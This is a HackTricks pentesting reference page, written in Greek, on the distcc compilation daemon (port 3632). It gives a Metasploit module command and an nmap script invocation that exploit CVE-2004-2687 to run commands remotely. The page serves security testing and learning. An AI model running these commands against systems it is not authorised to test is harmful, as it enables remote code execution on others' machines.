tip
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
Βασικές Πληροφορίες
Distcc είναι ένα εργαλείο που βελτιώνει τη διαδικασία μεταγλώττισης χρησιμοποιώντας τη μη χρησιμοποιούμενη επεξεργαστική ισχύ άλλων υπολογιστών στο δίκτυο. Όταν το distcc είναι ρυθμισμένο σε μια μηχανή, αυτή η μηχανή είναι ικανή να διανέμει τις εργασίες μεταγλώττισης σε ένα άλλο σύστημα. Αυτό το σύστημα παραλήπτης πρέπει να εκτελεί τον distccd daemon και να έχει εγκατεστημένο έναν συμβατό μεταγλωττιστή για να επεξεργαστεί τον αποσταλμένο κώδικα.
Προεπιλεγμένη θύρα: 3632
PORT STATE SERVICE
3632/tcp open distccd
Εκμετάλλευση
Ελέγξτε αν είναι ευάλωτο στο CVE-2004-2687 για να εκτελέσετε αυθαίρετο κώδικα:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Δεν νομίζω ότι το shodan ανιχνεύει αυτή την υπηρεσία.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post created by Álex B (@r1p)
tip
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.